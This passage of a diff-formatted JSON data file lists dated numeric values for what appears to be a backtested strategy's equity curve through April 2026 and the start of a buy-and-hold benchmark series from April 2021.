11138.961494303643 + ], + [ + "2025-09-10", + 11140.268135855184 + ], + [ + "2025-09-11", + 11141.57493068063 + ], + [ + "2025-09-12", + 11142.881878797964 + ], + [ + "2025-09-15", + 11144.188980225164 + ], + [ + "2025-09-16", + 11145.496234980217 + ], + [ + "2025-09-17", + 11146.803643081108 + ], + [ + "2025-09-18", + 11148.111204545825 + ], + [ + "2025-09-19", + 11149.418919392358 + ], + [ + "2025-09-22", + 11150.726787638698 + ], + [ + "2025-09-23", + 11152.03480930284 + ], + [ + "2025-09-24", + 11153.342984402783 + ], + [ + "2025-09-25", + 11154.651312956523 + ], + [ + "2025-09-26", + 11155.959794982062 + ], + [ + "2025-09-29", + 11157.268430497401 + ], + [ + "2025-09-30", + 11158.577219520546 + ], + [ + "2025-10-01", + 11159.886162069504 + ], + [ + "2025-10-02", + 11161.195258162285 + ], + [ + "2025-10-03", + 11162.504507816899 + ], + [ + "2025-10-06", + 11163.81391105136 + ], + [ + "2025-10-07", + 11165.123467883683 + ], + [ + "2025-10-08", + 11166.433178331885 + ], + [ + "2025-10-09", + 11167.743042413987 + ], + [ + "2025-10-10", + 11169.053060148011 + ], + [ + "2025-10-13", + 11170.36323155198 + ], + [ + "2025-10-14", + 11171.673556643922 + ], + [ + "2025-10-15", + 11169.994035441861 + ], + [ + "2025-10-16", + 11169.034090541214 + ], + [ + "2025-10-17", + 11198.374053736432 + ], + [ + "2025-10-20", + 11224.783765091854 + ], + [ + "2025-10-21", + 11226.100473914488 + ], + [ + "2025-10-22", + 11224.427337191955 + ], + [ + "2025-10-23", + 11252.946744251676 + ], + [ + "2025-10-24", + 11254.266756696357 + ], + [ + "2025-10-27", + 11255.586923983401 + ], + [ + "2025-10-28", + 11256.907246130972 + ], + [ + "2025-10-29", + 11258.227723157233 + ], + [ + "2025-10-30", + 11256.558355080353 + ], + [ + "2025-10-31", + 11287.747372543501 + ], + [ + "2025-11-03", + 11327.521210174582 + ], + [ + "2025-11-04", + 11328.849970481075 + ], + [ + "2025-11-05", + 11330.178886656086 + ], + [ + "2025-11-06", + 11328.5179587179 + ], + [ + "2025-11-07", + 11360.328411718026 + ], + [ + "2025-11-10", + 11420.029496487028 + ], + [ + "2025-11-11", + 11421.369108359066 + ], + [ + "2025-11-12", + 11422.70887737255 + ], + [ + "2025-11-13", + 11421.058803545915 + ], + [ + "2025-11-14", + 11434.867710024595 + ], + [ + "2025-11-17", + 11445.613629971127 + ], + [ + "2025-11-18", + 11398.334864408364 + ], + [ + "2025-11-19", + 11458.91451799502 + ], + [ + "2025-11-20", + 11457.268691224492 + ], + [ + "2025-11-21", + 11490.61807914163 + ], + [ + "2025-11-24", + 11526.845976939523 + ], + [ + "2025-11-25", + 11528.198118781416 + ], + [ + "2025-11-26", + 11529.550419234569 + ], + [ + "2025-11-28", + 11527.912878317587 + ], + [ + "2025-12-01", + 11559.802579198496 + ], + [ + "2025-12-02", + 11593.732105245599 + ], + [ + "2025-12-03", + 11595.092093078747 + ], + [ + "2025-12-04", + 11596.452240443517 + ], + [ + "2025-12-05", + 11594.822547358624 + ], + [ + "2025-12-08", + 11624.27143348203 + ], + [ + "2025-12-09", + 11645.458681561437 + ], + [ + "2025-12-10", + 11646.82473711409 + ], + [ + "2025-12-11", + 11648.190952910132 + ], + [ + "2025-12-12", + 11649.557328968362 + ], + [ + "2025-12-15", + 11650.923865307577 + ], + [ + "2025-12-16", + 11652.29056194658 + ], + [ + "2025-12-17", + 11650.667418904175 + ], + [ + "2025-12-18", + 11684.343311128521 + ], + [ + "2025-12-19", + 11685.713927992634 + ], + [ + "2025-12-22", + 11687.084705635194 + ], + [ + "2025-12-23", + 11688.455644075062 + ], + [ + "2025-12-24", + 11689.826743331101 + ], + [ + "2025-12-26", + 11691.198003422176 + ], + [ + "2025-12-29", + 11692.569424367151 + ], + [ + "2025-12-30", + 11693.941006184898 + ], + [ + "2025-12-31", + 11695.312748894285 + ], + [ + "2026-01-02", + 11696.684652514185 + ], + [ + "2026-01-05", + 11698.056717063475 + ], + [ + "2026-01-06", + 11699.428942561033 + ], + [ + "2026-01-07", + 11700.801329025739 + ], + [ + "2026-01-08", + 11702.173876476472 + ], + [ + "2026-01-09", + 11703.546584932119 + ], + [ + "2026-01-12", + 11704.919454411565 + ], + [ + "2026-01-13", + 11706.292484933701 + ], + [ + "2026-01-14", + 11707.665676517416 + ], + [ + "2026-01-15", + 11709.039029181604 + ], + [ + "2026-01-16", + 11710.41254294516 + ], + [ + "2026-01-20", + 11711.78621782698 + ], + [ + "2026-01-21", + 11713.160053845966 + ], + [ + "2026-01-22", + 11714.534051021019 + ], + [ + "2026-01-23", + 11715.908209371044 + ], + [ + "2026-01-26", + 11717.282528914946 + ], + [ + "2026-01-27", + 11718.657009671635 + ], + [ + "2026-01-28", + 11720.031651660021 + ], + [ + "2026-01-29", + 11721.406454899019 + ], + [ + "2026-01-30", + 11722.781419407542 + ], + [ + "2026-02-02", + 11724.156545204507 + ], + [ + "2026-02-03", + 11725.531832308836 + ], + [ + "2026-02-04", + 11726.90728073945 + ], + [ + "2026-02-05", + 11728.282890515273 + ], + [ + "2026-02-06", + 11726.66866165523 + ], + [ + "2026-02-09", + 11767.760154295349 + ], + [ + "2026-02-10", + 11769.140556264962 + ], + [ + "2026-02-11", + 11770.52112016085 + ], + [ + "2026-02-12", + 11771.901846002012 + ], + [ + "2026-02-13", + 11770.292733807444 + ], + [ + "2026-02-17", + 11806.65896560261 + ], + [ + "2026-02-18", + 11808.043930547252 + ], + [ + "2026-02-19", + 11809.429057953424 + ], + [ + "2026-02-20", + 11810.814347840187 + ], + [ + "2026-02-23", + 11812.199800226597 + ], + [ + "2026-02-24", + 11810.595415131718 + ], + [ + "2026-02-25", + 11844.82756075595 + ], + [ + "2026-02-26", + 11846.217003018555 + ], + [ + "2026-02-27", + 11847.606608267899 + ], + [ + "2026-03-02", + 11848.996376523099 + ], + [ + "2026-03-03", + 11847.396307803276 + ], + [ + "2026-03-04", + 11883.841930526374 + ], + [ + "2026-03-05", + 11885.235949319447 + ], + [ + "2026-03-06", + 11886.6301316361 + ], + [ + "2026-03-09", + 11888.024477495517 + ], + [ + "2026-03-10", + 11889.418986916882 + ], + [ + "2026-03-11", + 11890.813659919382 + ], + [ + "2026-03-12", + 11892.208496522204 + ], + [ + "2026-03-13", + 11893.60349674454 + ], + [ + "2026-03-16", + 11894.998660605583 + ], + [ + "2026-03-17", + 11896.393988124528 + ], + [ + "2026-03-18", + 11897.789479320572 + ], + [ + "2026-03-19", + 11899.185134212918 + ], + [ + "2026-03-20", + 11897.590952820765 + ], + [ + "2026-03-23", + 11933.830520840249 + ], + [ + "2026-03-24", + 11935.230403480615 + ], + [ + "2026-03-25", + 11936.630450332414 + ], + [ + "2026-03-26", + 11938.030661414907 + ], + [ + "2026-03-27", + 11936.44103674736 + ], + [ + "2026-03-30", + 11942.423957454046 + ], + [ + "2026-03-31", + 11981.978127448137 + ], + [ + "2026-04-01", + 11983.38365798157 + ], + [ + "2026-04-02", + 11984.789353388955 + ], + [ + "2026-04-06", + 11983.20521368963 + ], + [ + "2026-04-07", + 12000.582181633197 + ], + [ + "2026-04-08", + 12048.565478841927 + ], + [ + "2026-04-09", + 12049.978820318973 + ], + [ + "2026-04-10", + 12051.392327586223 + ], + [ + "2026-04-13", + 12049.816000663126 + ], + [ + "2026-04-14", + 12110.377036123376 + ], + [ + "2026-04-15", + 12111.797628325648 + ], + [ + "2026-04-16", + 12113.218387168663 + ], + [ + "2026-04-17", + 12114.639312671965 + ], + [ + "2026-04-20", + 12116.060404855107 + ], + [ + "2026-04-21", + 12117.481663737639 + ], + [ + "2026-04-22", + 12118.903089339115 + ], + [ + "2026-04-23", + 12120.324681679094 + ] + ], + "benchmark_bh": [ + [ + "2021-04-26", + 10000.0 + ], + [ + "2021-04-27", + 9956.676989603086 + ], + [ + "2021-04-28", + 9923.014760145224 + ], + [ + "2021-04-29", + 9958.726050905641 + ], + [ + "2021-04-30", + 9893.452494317906 + ], + [ + "2021-05-03", + 9840.762346537873 + ], + [ + "2021-05-04", + 9663.671348977325 + ], + [ + "2021-05-05", + 9631.181852717782 + ], + [ + "2021-05-06", + 9703.77164436065 + ], + [ + "2021-05-07", + 9782.51138144933 + ], + [ + "2021-05-10", + 9535.461417584058 + ], + [ + "2021-05-11", + 9522.28888063905 + ], + [ + "2021-05-12", + 9275.825283372935 + ], + [ + "2021-05-13", + 9347.536905886136 + ], + [ + "2021-05-14", + 9553.903889819783 + ], + [ + "2021-05-17", + 9495.944727261747 + ], + [ + "2021-05-18", + 9431.842062846901 + ], + [ + "2021-05-19", + 9442.6709744207 + ], + [ + "2021-05-20", + 9625.326471340619 + ], + [ + "2021-05-21", + 9572.052718499572 + ], + [ + "2021-05-24", + 9733.044869195604 + ], + [ + "2021-05-25", + 9746.511049696548 + ], + [ + "2021-05-26", + 9780.462320146775 + ], + [ + "2021-05-27", + 9743.874701282119 + ], + [ + "2021-05-28", + 9774.609700307756 + ], + [ + "2021-06-01", + 9742.119283535498 + ], + [ + "2021-06-02", + 9761.144440319526 + ], + [ + "2021-06-03", + 9659.575987910353 + ], + [ + "2021-06-04", + 9823.493528013181 + ], + [ + "2021-06-07", + 9852.76583233542 + ], + [ + "2021-06-08", + 9857.44940102698 + ], + [ + "2021-06-09", + 9859.790264860045 + ], + [ + "2021-06-10", + 9962.530529954818 + ], + [ + "2021-06-11", + 9988.581960288897 + ], + [ + "2021-06-14", + 10084.302395422621 + ], + [ + "2021-06-15", + 10018.442472235725 + ], + [ + "2021-06-16", + 9981.852091832925 + ], + [ + "2021-06-17", + 10108.595646471937 + ], + [ + "2021-06-18", + 10029.271383809526 + ], + [ + "2021-06-21", + 10091.60206124889 + ], + [ + "2021-06-22", + 10185.67569913631 + ], + [ + "2021-06-23", + 10190.659354972808 + ], + [ + "2021-06-24", + 10253.663847719214 + ], + [ + "2021-06-25", + 10241.062028657218 + ], + [ + "2021-06-28", + 10365.611080984776 + ], + [ + "2021-06-29", + 10403.120133076682 + ], + [ + "2021-06-30", + 10386.708311889222 + ], + [ + "2021-07-01", + 10390.811037057909 + ], + [ + "2021-07-02", + 10510.085551531176 + ], + [ + "2021-07-06", + 10555.509171942662 + ], + [ + "2021-07-07", + 10577.780977070857 + ], + [ + "2021-07-08", + 10513.894633143926 + ], + [ + "2021-07-09", + 10579.537315330192 + ], + [ + "2021-07-12", + 10620.858210572991 + ], + [ + "2021-07-13", + 10620.858210572991 + ], + [ + "2021-07-14", + 10639.90822120031 + ], + [ + "2021-07-15", + 10565.178237496146 + ], + [ + "2021-07-16", + 10479.609216578323 + ], + [ + "2021-07-19", + 10393.742870053706 + ], + [ + "2021-07-20", + 10514.480999743086 + ], + [ + "2021-07-21", + 10595.656413474428 + ], + [ + "2021-07-22", + 10665.698225923461 + ], + [ + "2021-07-23", + 10790.244516712875 + ], + [ + "2021-07-26", + 10798.743610606185 + ], + [ + "2021-07-27", + 10679.762739688855 + ], + [ + "2021-07-28", + 10720.791832401146 + ], + [ + "2021-07-29", + 10739.840002003035 + ], + [ + "2021-07-30", + 10683.866385370255 + ], + [ + "2021-08-02", + 10684.744554499921 + ], + [ + "2021-08-03", + 10749.509988069234 + ], + [ + "2021-08-04", + 10765.03995807617 + ], + [ + "2021-08-05", + 10833.324511753153 + ], + [ + "2021-08-06", + 10785.849068500966 + ], + [ + "2021-08-09", + 10805.778168770667 + ], + [ + "2021-08-10", + 10750.389077711616 + ], + [ + "2021-08-11", + 10731.926354196172 + ], + [ + "2021-08-12", + 10770.607218973682 + ], + [ + "2021-08-13", + 10808.414517185098 + ], + [ + "2021-08-16", + 10813.104529465658 + ], + [ + "2021-08-17", + 10717.861840430778 + ], + [ + "2021-08-18", + 10614.703662563605 + ], + [ + "2021-08-19", + 10665.98818742854 + ], + [ + "2021-08-20", + 10776.470884965274 + ], + [ + "2021-08-23", + 10937.649899742357 + ], + [ + "2021-08-24", + 10971.058988203722 + ], + [ + "2021-08-25", + 10983.658966240288 + ], + [ + "2021-08-26", + 10913.911717859908 + ], + [ + "2021-08-27", + 11019.99988769745 + ], + [ + "2021-08-30", + 11143.669850382625 + ], + [ + "2021-08-31", + 11134.583469377441 + ], + [ + "2021-09-01", + 11153.041590329314 + ], + [ + "2021-09-02", + 11147.770734525882 + ], + [ + "2021-09-03", + 11182.05523057877 + ], + [ + "2021-09-07", + 11197.88068516707 + ], + [ + "2021-09-08", + 11158.907097346337 + ], + [ + "2021-09-09", + 11120.51527356119 + ], + [ + "2021-09-10", + 11036.115303790828 + ], + [ + "2021-09-13", + 11028.496220052615 + ], + [ + "2021-09-14", + 10997.143556995525 + ], + [ + "2021-09-15", + 11078.902575787883 + ], + [ + "2021-09-16", + 11086.520739013382 + ], + [ + "2021-09-17", + 10955.230772077277 + ], + [ + "2021-09-20", + 10728.862887882196 + ], + [ + "2021-09-21", + 10742.063960721354 + ], + [ + "2021-09-22", + 10842.400767118475 + ], + [ + "2021-09-23", + 10942.44392995966 + ], + [ + "2021-09-24", + 10952.70672621402 + ], + [ + "2021-09-27", + 10865.284713201836 + ], + [ + "2021-09-28", + 10557.821499881577 + ], + [ + "2021-09-29", + 10540.51309931016 + ], + [ + "2021-09-30", + 10501.787129409635 + ], + [ + "2021-10-01", + 10566.91616550119 + ], + [ + "2021-10-04", + 10345.122308984637 + ], + [ + "2021-10-05", + 10484.772372394154 + ], + [ + "2021-10-06", + 10551.955072351839 + ], + [ + "2021-10-07", + 10648.769997103147 + ], + [ + "2021-10-08", + 10595.669300652431 + ], + [ + "2021-10-11", + 10514.40275616235 + ], + [ + "2021-10-12", + 10477.730450127956 + ], + [ + "2021-10-13", + 10561.637025083328 + ], + [ + "2021-10-14", + 10756.146884741038 + ], + [ + "2021-10-15", + 10823.916871810596 + ], + [ + "2021-10-18", + 10932.761056715457 + ], + [ + "2021-10-19", + 11015.493977959795 + ], + [ + "2021-10-20", + 11001.119251409604 + ], + [ + "2021-10-21", + 11068.30011034186 + ], + [ + "2021-10-22", + 10975.300710792302 + ], + [ + "2021-10-25", + 11087.66493631755 + ], + [ + "2021-10-26", + 11122.576301529036 + ], + [ + "2021-10-27", + 11148.393921633622 + ], + [ + "2021-10-28", + 11272.201040713266 + ], + [ + "2021-10-29", + 11327.647203560617 + ], + [ + "2021-11-01", + 11366.374093973855 + ], + [ + "2021-11-02", + 11413.90016542534 + ], + [ + "2021-11-03", + 11535.067254039694 + ], + [ + "2021-11-04", + 11682.931052401014 + ], + [ + "2021-11-05", + 11694.079381886759 + ], + [ + "2021-11-08", + 11678.234596531453 + ], + [ + "2021-11-09", + 11597.849903221895 + ], + [ + "2021-11-10", + 11427.398563871293 + ], + [ + "2021-11-11", + 11459.080770480188 + ], + [ + "2021-11-12", + 11579.660571982668 + ], + [ + "2021-11-15", + 11577.019621004663 + ], + [ + "2021-11-16", + 11659.45981920578 + ], + [ + "2021-11-17", + 11665.621731316884 + ], + [ + "2021-11-18", + 11786.492414837156 + ], + [ + "2021-11-19", + 11852.210579066013 + ], + [ + "2021-11-22", + 11714.61325900991 + ], + [ + "2021-11-23", + 11661.220760028687 + ], + [ + "2021-11-24", + 11698.772155705463 + ], + [ + "2021-11-26", + 11476.978299188908 + ], + [ + "2021-11-29", + 11726.056152564304 + ], + [ + "2021-11-30", + 11553.842951878081 + ], + [ + "2021-12-01", + 11357.282189892383 + ], + [ + "2021-12-02", + 11439.133259956196 + ], + [ + "2021-12-03", + 11240.221508497574 + ], + [ + "2021-12-06", + 11330.289075051334 + ], + [ + "2021-12-07", + 11671.48815884662 + ], + [ + "2021-12-08", + 11723.708845142239 + ], + [ + "2021-12-09", + 11551.202921412792 + ], + [ + "2021-12-10", + 11676.769140289913 + ], + [ + "2021-12-13", + 11508.075059711358 + ], + [ + "2021-12-14", + 11388.964396501278 + ], + [ + "2021-12-15", + 11648.605133275973 + ], + [ + "2021-12-16", + 11349.064772889722 + ], + [ + "2021-12-17", + 11292.443115305909 + ], + [ + "2021-12-20", + 11182.903943301571 + ], + [ + "2021-12-21", + 11433.180304231293 + ], + [ + "2021-12-22", + 11572.418898457414 + ], + [ + "2021-12-23", + 11659.664173028406 + ], + [ + "2021-12-27", + 11852.367066227484 + ], + [ + "2021-12-28", + 11797.432708449414 + ], + [ + "2021-12-29", + 11795.671767626507 + ], + [ + "2021-12-30", + 11760.420733223356 + ], + [ + "2021-12-31", + 11686.984069883116 + ], + [ + "2022-01-03", + 11799.490974879116 + ], + [ + "2022-01-04", + 11646.444689934957 + ], + [ + "2022-01-05", + 11288.654284972878 + ], + [ + "2022-01-06", + 11280.720385886294 + ], + [ + "2022-01-07", + 11158.520482006232 + ], + [ + "2022-01-10", + 11165.862491417369 + ], + [ + "2022-01-11", + 11333.597397747377 + ], + [ + "2022-01-12", + 11378.540510521874 + ], + [ + "2022-01-13", + 11093.893125344099 + ], + [ + "2022-01-14", + 11162.926976370714 + ], + [ + "2022-01-18", + 10885.037075030346 + ], + [ + "2022-01-19", + 10765.478122128288 + ], + [ + "2022-01-20", + 10625.651320277579 + ], + [ + "2022-01-21", + 10331.016372147089 + ], + [ + "2022-01-24", + 10378.311394907227 + ], + [ + "2022-01-25", + 10137.726191836138 + ], + [ + "2022-01-26", + 10121.863916739258 + ], + [ + "2022-01-27", + 10019.932782320559 + ], + [ + "2022-01-28", + 10334.24737177511 + ], + [ + "2022-01-31", + 10664.721561933338 + ], + [ + "2022-02-01", + 10737.277294605768 + ], + [ + "2022-02-02", + 10824.522569176761 + ], + [ + "2022-02-03", + 10385.656165856508 + ], + [ + "2022-02-04", + 10516.670899490966 + ], + [ + "2022-02-07", + 10432.067496410691 + ], + [ + "2022-02-08", + 10549.273618814395 + ], + [ + "2022-02-09", + 10772.82289307757 + ], + [ + "2022-02-10", + 10529.005769865746 + ], + [ + "2022-02-11", + 10195.007857036275 + ], + [ + "2022-02-14", + 10207.64005301785 + ], + [ + "2022-02-15", + 10461.443818669673 + ], + [ + "2022-02-16", + 10458.80102666624 + ], + [ + "2022-02-17", + 10147.716516326996 + ], + [ + "2022-02-18", + 10031.974929652117 + ], + [ + "2022-02-22", + 9931.218369457167 + ], + [ + "2022-02-23", + 9676.826396180755 + ], + [ + "2022-02-24", + 10002.012240793976 + ], + [ + "2022-02-25", + 10157.114030629693 + ], + [ + "2022-02-28", + 10187.37036304377 + ], + [ + "2022-03-01", + 10031.387642540243 + ], + [ + "2022-03-02", + 10199.709835982125 + ], + [ + "2022-03-03", + 10054.009242499962 + ], + [ + "2022-03-04", + 9908.304966966942 + ], + [ + "2022-03-07", + 9542.876147499643 + ], + [ + "2022-03-08", + 9498.519401324305 + ], + [ + "2022-03-09", + 9840.449372214931 + ], + [ + "2022-03-10", + 9731.172546334237 + ], + [ + "2022-03-11", + 9529.363020850258 + ], + [ + "2022-03-14", + 9346.3568085861 + ], + [ + "2022-03-15", + 9639.521697911476 + ], + [ + "2022-03-16", + 9997.020300343047 + ], + [ + "2022-03-17", + 10118.045629999362 + ], + [ + "2022-03-18", + 10325.140739490207 + ], + [ + "2022-03-21", + 10296.436391512836 + ], + [ + "2022-03-22", + 10498.789019498392 + ], + [ + "2022-03-23", + 10347.90501892068 + ], + [ + "2022-03-24", + 10577.904325774605 + ], + [ + "2022-03-25", + 10569.082131918492 + ], + [ + "2022-03-28", + 10732.6121361685 + ], + [ + "2022-03-29", + 10917.315773878261 + ], + [ + "2022-03-30", + 10796.728608274065 + ], + [ + "2022-03-31", + 10662.90539034756 + ], + [ + "2022-04-01", + 10642.61360806833 + ], + [ + "2022-04-04", + 10861.7296930983 + ], + [ + "2022-04-05", + 10620.552600351764 + ], + [ + "2022-04-06", + 10389.964165360536 + ], + [ + "2022-04-07", + 10414.672567644107 + ], + [ + "2022-04-08", + 10269.08243568769 + ], + [ + "2022-04-11", + 10026.145322630962 + ], + [ + "2022-04-12", + 9983.794373660596 + ], + [ + "2022-04-13", + 10186.731527219883 + ], + [ + "2022-04-14", + 9953.789341217585 + ], + [ + "2022-04-18", + 9961.437881362664 + ], + [ + "2022-04-19", + 10184.084132652879 + ], + [ + "2022-04-20", + 10035.554803598947 + ], + [ + "2022-04-21", + 9827.90922750481 + ], + [ + "2022-04-22", + 9570.555044313021 + ], + [ + "2022-04-25", + 9693.496881441 + ], + [ + "2022-04-26", + 9327.617931256294 + ], + [ + "2022-04-27", + 9316.440145363686 + ], + [ + "2022-04-28", + 9647.322122654454 + ], + [ + "2022-04-29", + 9213.205564941205 + ], + [ + "2022-05-02", + 9367.028762616432 + ], + [ + "2022-05-03", + 9377.028292234436 + ], + [ + "2022-05-04", + 9694.086009578303 + ], + [ + "2022-05-05", + 9205.850668352065 + ], + [ + "2022-05-06", + 9095.558516947238 + ], + [ + "2022-05-09", + 8739.677255355105 + ], + [ + "2022-05-10", + 8845.852873900529 + ], + [ + "2022-05-11", + 8583.50214769424 + ], + [ + "2022-05-12", + 8563.20576285144 + ], + [ + "2022-05-13", + 8880.558964776674 + ], + [ + "2022-05-16", + 8777.617107397415 + ], + [ + "2022-05-17", + 9004.968099171621 + ], + [ + "2022-05-18", + 8562.912119295503 + ], + [ + "2022-05-19", + 8517.030083552178 + ], + [ + "2022-05-20", + 8490.559819932985 + ], + [ + "2022-05-23", + 8631.737013935917 + ], + [ + "2022-05-24", + 8448.204268399048 + ], + [ + "2022-05-25", + 8566.442285555748 + ], + [ + "2022-05-26", + 8803.794647973386 + ], + [ + "2022-05-27", + 9091.146499506467 + ], + [ + "2022-05-31", + 9067.029986898342 + ], + [ + "2022-06-01", + 8999.970635644406 + ], + [ + "2022-06-02", + 9246.440676499522 + ], + [ + "2022-06-03", + 9005.851791377576 + ], + [ + "2022-06-06", + 9035.8513007443 + ], + [ + "2022-06-07", + 9113.792032796764 + ], + [ + "2022-06-08", + 9048.207342911513 + ], + [ + "2022-06-09", + 8805.854755428516 + ], + [ + "2022-06-10", + 8495.265480929693 + ], + [ + "2022-06-13", + 8100.267952046074 + ], + [ + "2022-06-14", + 8114.97222214807 + ], + [ + "2022-06-15", + 8317.620334714993 + ], + [ + "2022-06-16", + 7982.033616940233 + ], + [ + "2022-06-17", + 8079.089716022748 + ], + [ + "2022-06-21", + 8282.924369478707 + ], + [ + "2022-06-22", + 8270.842640100424 + ], + [ + "2022-06-23", + 8394.018287457895 + ], + [ + "2022-06-24", + 8681.627882551047 + ], + [ + "2022-06-27", + 8617.976269366322 + ], + [ + "2022-06-28", + 8355.41382523569 + ], + [ + "2022-06-29", + 8363.076173071488 + ], + [ + "2022-06-30", + 8259.350038859444 + ], + [ + "2022-07-01", + 8313.865563352401 + ], + [ + "2022-07-05", + 8456.196159786647 + ], + [ + "2022-07-06", + 8510.415279185523 + ], + [ + "2022-07-07", + 8692.530435142009 + ], + [ + "2022-07-08", + 8703.4348287584 + ], + [ + "2022-07-11", + 8517.49126042216 + ], + [ + "2022-07-12", + 8434.978341716596 + ], + [ + "2022-07-13", + 8417.592618077157 + ], + [ + "2022-07-14", + 8447.651960770325 + ], + [ + "2022-07-15", + 8600.88603030825 + ], + [ + "2022-07-18", + 8528.097407919042 + ], + [ + "2022-07-19", + 8790.363446955593 + ], + [ + "2022-07-20", + 8929.751164241468 + ], + [ + "2022-07-21", + 9057.937162304157 + ], + [ + "2022-07-22", + 8899.101772898282 + ], + [ + "2022-07-25", + 8848.41834283594 + ], + [ + "2022-07-26", + 8674.556503877982 + ], + [ + "2022-07-27", + 9041.138725776593 + ], + [ + "2022-07-28", + 9129.544766880615 + ], + [ + "2022-07-29", + 9296.038822071429 + ], + [ + "2022-08-01", + 9290.441184254336 + ], + [ + "2022-08-02", + 9262.740195135808 + ], + [ + "2022-08-03", + 9514.987373787351 + ], + [ + "2022-08-04", + 9559.485878920728 + ], + [ + "2022-08-05", + 9481.39602380851 + ], + [ + "2022-08-08", + 9450.746632465323 + ], + [ + "2022-08-09", + 9343.776611447256 + ], + [ + "2022-08-10", + 9604.56983014055 + ], + [ + "2022-08-11", + 9550.055226160308 + ], + [ + "2022-08-12", + 9736.001556034693 + ], + [ + "2022-08-15", + 9814.680539284214 + ], + [ + "2022-08-16", + 9791.693495776826 + ], + [ + "2022-08-17", + 9680.01137017305 + ], + [ + "2022-08-18", + 9703.290216210948 + ], + [ + "2022-08-19", + 9514.103681581397 + ], + [ + "2022-08-22", + 9263.624807854478 + ], + [ + "2022-08-23", + 9255.96430104411 + ], + [ + "2022-08-24", + 9282.77699539311 + ], + [ + "2022-08-25", + 9446.917299572855 + ], + [ + "2022-08-26", + 9059.705467228781 + ], + [ + "2022-08-29", + 8970.416654431518 + ], + [ + "2022-08-30", + 8870.517091573802 + ], + [ + "2022-08-31", + 8818.948128280075 + ], + [ + "2022-09-01", + 8822.782063736116 + ], + [ + "2022-09-02", + 8698.128072959102 + ], + [ + "2022-09-06", + 8635.656557074411 + ], + [ + "2022-09-07", + 8810.110285707817 + ], + [ + "2022-09-08", + 8855.786126603085 + ], + [ + "2022-09-09", + 9049.391122262406 + ], + [ + "2022-09-12", + 9156.949350905063 + ], + [ + "2022-09-13", + 8654.811506151189 + ], + [ + "2022-09-14", + 8723.471629015703 + ], + [ + "2022-09-15", + 8578.194471382227 + ], + [ + "2022-09-16", + 8525.739974857115 + ], + [ + "2022-09-19", + 8592.132874905728 + ], + [ + "2022-09-20", + 8523.645808431547 + ], + [ + "2022-09-21", + 8371.02019779793 + ], + [ + "2022-09-22", + 8267.991812223507 + ], + [ + "2022-09-23", + 8133.37511233707 + ], + [ + "2022-09-26", + 8099.72116749364 + ], + [ + "2022-09-27", + 8102.968736350523 + ], + [ + "2022-09-28", + 8264.154194716606 + ], + [ + "2022-09-29", + 8025.917219580299 + ], + [ + "2022-09-30", + 7889.825858325177 + ], + [ + "2022-10-03", + 8074.920713938615 + ], + [ + "2022-10-04", + 8328.806405222032 + ], + [ + "2022-10-05", + 8324.3778185524 + ], + [ + "2022-10-06", + 8258.840995328306 + ], + [ + "2022-10-07", + 7944.143472584508 + ], + [ + "2022-10-10", + 7864.731761214215 + ], + [ + "2022-10-11", + 7756.686581345571 + ], + [ + "2022-10-12", + 7754.028140625991 + ], + [ + "2022-10-13", + 7935.879109433405 + ], + [ + "2022-10-14", + 7697.3466497157315 + ], + [ + "2022-10-17", + 7951.524143529657 + ], + [ + "2022-10-18", + 8014.4043670596 + ], + [ + "2022-10-19", + 7985.177167860372 + ], + [ + "2022-10-20", + 7944.439877678588 + ], + [ + "2022-10-21", + 8130.71851264292 + ], + [ + "2022-10-24", + 8220.166574139797 + ], + [ + "2022-10-25", + 8390.207364819717 + ], + [ + "2022-10-26", + 8204.817945137625 + ], + [ + "2022-10-27", + 8055.440823873608 + ], + [ + "2022-10-28", + 8301.94032113559 + ], + [ + "2022-10-31", + 8205.408914300358 + ], + [ + "2022-11-01", + 8121.566775235005 + ], + [ + "2022-11-02", + 7843.180717541502 + ], + [ + "2022-11-03", + 7689.967359539655 + ], + [ + "2022-11-04", + 7813.659874786337 + ], + [ + "2022-11-07", + 7899.569485408539 + ], + [ + "2022-11-08", + 7957.133748012037 + ], + [ + "2022-11-09", + 7773.510792229142 + ], + [ + "2022-11-10", + 8347.107118499718 + ], + [ + "2022-11-11", + 8500.913746946084 + ], + [ + "2022-11-14", + 8426.520670895441 + ], + [ + "2022-11-15", + 8543.127539521984 + ], + [ + "2022-11-16", + 8426.520670895441 + ], + [ + "2022-11-17", + 8407.919870472815 + ], + [ + "2022-11-18", + 8408.218116592325 + ], + [ + "2022-11-21", + 8321.720298345535 + ], + [ + "2022-11-22", + 8441.57473582896 + ], + [ + "2022-11-23", + 8526.301487612982 + ], + [ + "2022-11-25", + 8470.212806890884 + ], + [ + "2022-11-28", + 8345.927021199685 + ], + [ + "2022-11-29", + 8282.754074626519 + ], + [ + "2022-11-30", + 8660.328138849402 + ], + [ + "2022-12-01", + 8670.955458138718 + ], + [ + "2022-12-02", + 8636.414139038474 + ], + [ + "2022-12-05", + 8491.468365982231 + ], + [ + "2022-12-06", + 8315.519724700422 + ], + [ + "2022-12-07", + 8281.572136301054 + ], + [ + "2022-12-08", + 8379.581886555829 + ], + [ + "2022-12-09", + 8326.147043989738 + ], + [ + "2022-12-12", + 8430.651931958277 + ], + [ + "2022-12-13", + 8521.281931780619 + ], + [ + "2022-12-14", + 8458.107144182024 + ], + [ + "2022-12-15", + 8174.115164056998 + ], + [ + "2022-12-16", + 8096.175352517248 + ], + [ + "2022-12-19", + 7982.397219462474 + ], + [ + "2022-12-20", + 7976.184679152071 + ], + [ + "2022-12-21", + 8091.888524805654 + ], + [ + "2022-12-22", + 7893.9184578540035 + ], + [ + "2022-12-23", + 7911.673307091971 + ], + [ + "2022-12-27", + 7799.815363559718 + ], + [ + "2022-12-28", + 7696.836225415522 + ], + [ + "2022-12-29", + 7884.449143559573 + ], + [ + "2022-12-30", + 7879.714026156001 + ], + [ + "2023-01-03", + 7826.449478442099 + ], + [ + "2023-01-04", + 7863.734845944373 + ], + [ + "2023-01-05", + 7740.631919091351 + ], + [ + "2023-01-06", + 7954.284761160549 + ], + [ + "2023-01-09", + 8005.774560360826 + ], + [ + "2023-01-10", + 8073.539024354097 + ], + [ + "2023-01-11", + 8213.213941606908 + ], + [ + "2023-01-12", + 8257.60198521454 + ], + [ + "2023-01-13", + 8314.418791493836 + ], + [ + "2023-01-17", + 8331.285345962277 + ], + [ + "2023-01-18", + 8222.977819969989 + ], + [ + "2023-01-19", + 8142.193624142324 + ], + [ + "2023-01-20", + 8365.019375411872 + ], + [ + "2023-01-23", + 8550.858005298654 + ], + [ + "2023-01-24", + 8533.399561154769 + ], + [ + "2023-01-25", + 8514.460012053194 + ], + [ + "2023-01-26", + 8680.468957043446 + ], 